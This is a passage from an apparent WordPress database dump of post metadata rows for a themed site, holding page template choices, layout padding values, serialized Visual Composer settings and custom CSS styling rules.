!important;}'),(46177,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46178,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46179,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46180,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46181,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46182,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46183,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46184,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46185,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46186,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46187,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46188,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46189,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46190,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46191,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46192,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46193,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46194,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46195,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(46196,1857,'_wp_page_template','full-width.php'),(46197,1857,'slide_template','default'),(46198,1857,'_wpb_vc_js_status','true'),(46199,1857,'mkdf_page_content_behind_header_meta','no'),(46200,1857,'mkdf_disable_vertical_header_background_image_meta','no'),(46201,1857,'mkdf_disable_header_widget_areas_meta','no'),(46202,1857,'mkdf_page_content_padding','0'),(46203,1857,'_dp_original','1852'),(46204,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46205,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(46206,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46207,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46208,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46209,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46210,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46211,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(46212,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(46213,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(46214,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(46215,3074,'_wp_page_template','full-width.php'),(46216,3074,'slide_template','default'),(46217,3074,'_wpb_vc_js_status','true'),(46218,3074,'mkdf_page_content_behind_header_meta','no'),(46219,3074,'mkdf_disable_vertical_header_background_image_meta','no'),(46220,3074,'mkdf_disable_header_widget_areas_meta','no'),(46221,3074,'mkdf_page_content_padding','120px 0 60px'),(46222,3074,'_dp_original','1382'),(46223,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46224,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(46225,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46226,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46227,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46228,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46229,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46230,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46231,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(46232,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(46233,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(46234,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(46235,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(46236,1948,'_wp_page_template','full-width.php'),(46237,1948,'slide_template','default'),(46238,1948,'_wpb_vc_js_status','true'),(46239,1948,'mkdf_page_content_behind_header_meta','no'),(46240,1948,'mkdf_disable_vertical_header_background_image_meta','no'),(46241,1948,'mkdf_disable_header_widget_areas_meta','no'),(46242,1948,'mkdf_page_content_padding','105px 0 60px'),(46243,1948,'_dp_original','1904'),(46244,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46245,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46246,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46247,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46248,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46249,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46250,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46251,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46252,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46253,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46254,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46255,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46256,1995,'_wp_page_template','full-width.php'),(46257,1995,'slide_template','default'),(46258,1995,'_wpb_vc_js_status','true'),(46259,1995,'mkdf_page_content_behind_header_meta','no'),(46260,1995,'mkdf_disable_vertical_header_background_image_meta','no'),(46261,1995,'mkdf_disable_header_widget_areas_meta','no'),(46262,1995,'mkdf_page_content_padding','0'),(46263,1995,'_dp_original','1857'),(46264,1995,'_wpb_shortcodes_custom_css','.vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}.vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}'),(46265,2019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46266,2019,'_wp_page_template','full-width.php'),(46267,2019,'slide_template','default'),(46268,2019,'_wpb_vc_js_status','true'),(46269,2019,'mkdf_page_content_behind_header_meta','no'),(46270,2019,'mkdf_disable_vertical_header_background_image_meta','no'),(46271,2019,'mkdf_disable_header_widget_areas_meta','no'),(46272,2019,'_wpb_shortcodes_custom_css','.vc_custom_1535019332070{padding-top: 43px !important;padding-bottom: 100px !important;}'),(46273,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46274,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(46275,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46276,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46277,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46278,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46279,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(46280,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(46281,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(46282,2174,'_wp_page_template','full-width.php'),(46283,2174,'slide_template','default'),(46284,2174,'_wpb_vc_js_status','true'),(46285,2174,'mkdf_page_content_behind_header_meta','no'),(46286,2174,'mkdf_disable_vertical_header_background_image_meta','no'),(46287,2174,'mkdf_disable_header_widget_areas_meta','no'),(46288,2174,'mkdf_page_content_padding','120px 0'),(46289,2174,'_dp_original','1297'),(46290,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46291,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46292,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46293,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46294,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46295,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46296,2387,'_wp_page_template','full-width.php'),(46297,2387,'slide_template','default'),(46298,2387,'_wpb_vc_js_status','true'),(46299,2387,'mkdf_page_content_behind_header_meta','no'),(46300,2387,'mkdf_disable_vertical_header_background_image_meta','no'),(46301,2387,'mkdf_disable_header_widget_areas_meta','no'),(46302,2387,'mkdf_page_content_padding','120px 0 100px'),(46303,2387,'_dp_original','1382'),(46304,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46305,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46306,2419,'_wp_page_template','blog-standard'),(46307,2419,'slide_template','default'),(46308,2419,'_wpb_vc_js_status','false'),(46309,2419,'mkdf_page_content_behind_header_meta','no'),(46310,2419,'mkdf_blog_category_meta','recepies'),(46311,2419,'mkdf_show_posts_per_page_meta','5'),(46312,2419,'mkdf_sidebar_layout_meta','sidebar-25-left'),(46313,2419,'mkdf_disable_vertical_header_background_image_meta','no'),(46314,2419,'mkdf_disable_header_widget_areas_meta','no'),(46315,2419,'mkdf_page_content_padding','120px 0 100px'),(46316,2419,'_dp_original','1679'),(46317,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46318,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46319,2421,'_wp_page_template','blog-standard'),(46320,2421,'slide_template','default'),(46321,2421,'_wpb_vc_js_status','false'),(46322,2421,'mkdf_page_content_behind_header_meta','no'),(46323,2421,'mkdf_blog_category_meta','recepies'),(46324,2421,'mkdf_show_posts_per_page_meta','5'),(46325,2421,'mkdf_sidebar_layout_meta','no-sidebar'),(46326,2421,'mkdf_disable_vertical_header_background_image_meta','no'),(46327,2421,'mkdf_disable_header_widget_areas_meta','no'),(46328,2421,'mkdf_page_content_padding','120px 0 100px'),(46329,2421,'_dp_original','1679'),(46330,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46331,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46332,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46333,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46334,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46335,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46336,2435,'_wp_page_template','full-width.php'),(46337,2435,'slide_template','default'),(46338,2435,'_wpb_vc_js_status','true'),(46339,2435,'mkdf_page_content_behind_header_meta','no'),(46340,2435,'mkdf_disable_vertical_header_background_image_meta','no'),(46341,2435,'mkdf_disable_header_widget_areas_meta','no'),(46342,2435,'mkdf_page_content_padding','120px 0 0'),(46343,2435,'_dp_original','1742'),(46344,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46345,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46346,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46347,2448,'_wp_page_template','full-width.php'),(46348,2448,'slide_template','default'),(46349,2448,'_wpb_vc_js_status','true'),(46350,2448,'mkdf_page_content_behind_header_meta','no'),(46351,2448,'mkdf_page_content_padding','0 0 0 0 '),(46352,2448,'mkdf_page_content_padding_mobile','0 0 0 0'),(46353,2448,'mkdf_set_menu_area_position_meta','center'),(46354,2448,'mkdf_disable_vertical_header_background_image_meta','no'),(46355,2448,'mkdf_menu_area_background_color_meta','#ffffff'),(46356,2448,'mkdf_menu_area_background_transparency_meta','40%'),(46357,2448,'mkdf_disable_header_widget_areas_meta','no'),(46358,2448,'mkdf_show_title_area_meta','no'),(46359,2448,'mkdf_disable_footer_meta','yes'),(46360,2448,'mkdf_header_type_meta','header-standard'),(46361,2448,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(46362,2448,'mkdf_header_behaviour_meta','no-behavior'),(46363,2448,'_dp_original','1811'),(46364,2448,'_wpb_shortcodes_custom_css','.vc_custom_1535553249523{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #e7dfdf !important;}'),(46365,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46366,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46367,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46368,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46369,2457,'_wp_page_template','default'),(46370,2457,'slide_template','default'),(46371,2457,'_wpb_vc_js_status','true'),(46372,2457,'mkdf_page_content_behind_header_meta','no'),(46373,2457,'mkdf_page_content_padding','100px 0 120px 0'),(46374,2457,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(46375,2457,'mkdf_disable_vertical_header_background_image_meta','no'),(46376,2457,'mkdf_disable_header_widget_areas_meta','no'),(46377,2457,'mkdf_title_area_type_meta','attika'),(46378,2457,'_dp_original','1185'),(46379,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46380,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46381,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46382,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46383,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46384,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46385,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46386,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46387,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46388,2472,'_wp_page_template','full-width.php'),(46389,2472,'slide_template','default'),(46390,2472,'_wpb_vc_js_status','true'),(46391,2472,'mkdf_page_content_behind_header_meta','no'),(46392,2472,'mkdf_disable_vertical_header_background_image_meta','no'),(46393,2472,'mkdf_disable_header_widget_areas_meta','no'),(46394,2472,'mkdf_page_content_padding','120px 0 105px'),(46395,2472,'_dp_original','1662'),(46396,2472,'_wpb_shortcodes_custom_css','.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1535626950960{margin-top: -60px !important;}.vc_custom_1535627671543{padding-top: 160px !important;padding-bottom: 120px !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535632790817{padding-right: 10% !important;padding-left: 10% !important;}.vc_custom_1535119322528{margin-top: -20px !important;}'),(46397,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46398,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46399,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46400,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46401,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46402,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46403,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46404,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46405,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46406,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46407,2477,'_wp_page_template','full-width.php'),(46408,2477,'slide_template','default'),(46409,2477,'_wpb_vc_js_status','true'),(46410,2477,'mkdf_page_content_behind_header_meta','no'),(46411,2477,'mkdf_disable_vertical_header_background_image_meta','no'),(46412,2477,'mkdf_disable_header_widget_areas_meta','no'),(46413,2477,'mkdf_page_content_padding','120px 0 60px'),(46414,2477,'_dp_original','2472'),(46415,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46416,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(46417,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46418,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46419,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46420,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46421,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46422,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46423,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46424,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46425,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46426,2494,'_wp_page_template','full-width.php'),(46427,2494,'slide_template','default'),(46428,2494,'_wpb_vc_js_status','true'),(46429,2494,'mkdf_page_content_behind_header_meta','no'),(46430,2494,'mkdf_disable_vertical_header_background_image_meta','no'),(46431,2494,'mkdf_disable_header_widget_areas_meta','no'),(46432,2494,'mkdf_page_content_padding','110px 0 155px'),(46433,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(46434,2494,'_dp_original','2472'),(46435,2542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46436,2542,'_wp_page_template','full-width.php'),(46437,2542,'slide_template','default'),(46438,2542,'_wpb_vc_js_status','true'),(46439,2542,'mkdf_page_content_behind_header_meta','no'),(46440,2542,'mkdf_disable_vertical_header_background_image_meta','no'),(46441,2542,'mkdf_disable_header_widget_areas_meta','no'),(46442,2542,'_wpb_shortcodes_custom_css','.vc_custom_1535962435703{padding-top: 80px !important;padding-bottom: 125px !important;}.vc_custom_1535967241855{padding-top: 50px !important;padding-bottom: 95px !important;}.vc_custom_1536937014058{margin-top: -15px !important;}.vc_custom_1537367428822{padding-top: 21% !important;padding-bottom: 18% !important;}'),(46443,2542,'mkdf_page_content_padding','0'),(46444,2542,'mkdf_disable_header_meta','yes'),(46445,2542,'mkdf_show_title_area_meta','no'),(46446,2542,'mkdf_disable_footer_meta','yes'),(46447,2542,'mkdf_smooth_page_transitions_meta','yes'),(46448,2542,'mkdf_page_transition_preloader_meta','yes'),(46449,2542,'mkdf_smooth_pt_spinner_type_meta','pulse'),(46450,2542,'mkdf_smooth_pt_spinner_color_meta','#000000'),(46451,2542,'_wpb_post_custom_css','.mkdf-landing-homes-section {\n    display: none;\n}\n\n.mkdf-landing-bottom-section:after {\n    position: absolute;\n    left: 0;\n    bottom: 0;\n    z-index: -23;\n    width: 29%;\n    height: 476px;\n    background-color: #fef8f7;\n}\n'),(46452,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46453,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46454,2625,'_wp_page_template','default'),(46455,2625,'slide_template','default'),(46456,2625,'_wpb_vc_js_status','true'),(46457,2625,'mkdf_page_content_behind_header_meta','no'),(46458,2625,'mkdf_page_content_padding','120px 0 160px 0'),(46459,2625,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(46460,2625,'mkdf_disable_vertical_header_background_image_meta','no'),(46461,2625,'mkdf_disable_header_widget_areas_meta','no'),(46462,2625,'mkdf_title_area_type_meta','attika'),(46463,2625,'_dp_original','1151'),(46464,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46465,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46466,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46467,2627,'_wp_page_template','default'),(46468,2627,'slide_template','default'),(46469,2627,'_wpb_vc_js_status','true'),(46470,2627,'mkdf_page_content_behind_header_meta','no'),(46471,2627,'mkdf_page_content_padding','120px 0 170px 0'),(46472,2627,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(46473,2627,'mkdf_disable_vertical_header_background_image_meta','no'),(46474,2627,'mkdf_disable_header_widget_areas_meta','no'),(46475,2627,'mkdf_title_area_type_meta','attika'),(46476,2627,'_dp_original','1182'),(46477,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46478,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46479,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46480,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46481,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46482,2646,'_wp_page_template','default'),(46483,2646,'slide_template','default'),(46484,2646,'_wpb_vc_js_status','true'),(46485,2646,'mkdf_page_content_behind_header_meta','no'),(46486,2646,'mkdf_page_content_padding','100px 0 120px 0'),(46487,2646,'mkdf_page_content_padding_mobile','100px 0 120px 